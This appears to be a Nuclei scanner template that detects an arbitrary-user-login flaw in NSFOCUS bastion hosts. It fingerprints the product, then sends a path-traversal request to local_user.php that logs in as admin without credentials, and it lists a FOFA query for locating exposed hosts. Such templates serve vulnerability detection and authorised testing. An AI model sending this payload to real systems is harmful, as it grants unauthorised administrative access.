52 lines
1.5 KiB
YAML
52 lines
1.5 KiB
YAML
id: nsfocus-auth-bypass
|
|
|
|
info:
|
|
name: Nsfocus - Arbitrary User Login
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
Nsfocus bastion host has an arbitrary user login vulnerability. Attackers can use the vulnerability to log in any user by including www/local_user.php
|
|
reference:
|
|
- https://forum.butian.net/article/251
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
fofa-query: body="/needUsbkey.php?username=" && "NSFOCUS"
|
|
tags: nsfocus,auth-bypass
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(tolower(body), 'nsfocus')"
|
|
- "contains(header, 'NSFOCUS')"
|
|
condition: or
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'status": 200'
|
|
|
|
- type: word
|
|
part: content_type
|
|
words:
|
|
- application/json
|
|
# digest: 4a0a00473045022063b4c3a98368aef012d2f94d3888d7a09b3caa1538d37416901cecdd20605844022100c3caf073480a090af06034966b9a5d5ae6bdfe169464af2f85aa9c0e1cdfc7f6:922c64590222798bb761d5b6d8e72950 |